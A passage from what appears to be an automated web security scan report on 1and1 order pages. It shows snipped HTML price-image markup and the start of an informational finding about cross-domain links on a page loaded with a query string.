</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/3/99/none/month.png" alt="ab 3.99 &#8364;/Monat*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...

4.6. http://order.1and1.com/xml/order/Instant

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Instant

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain: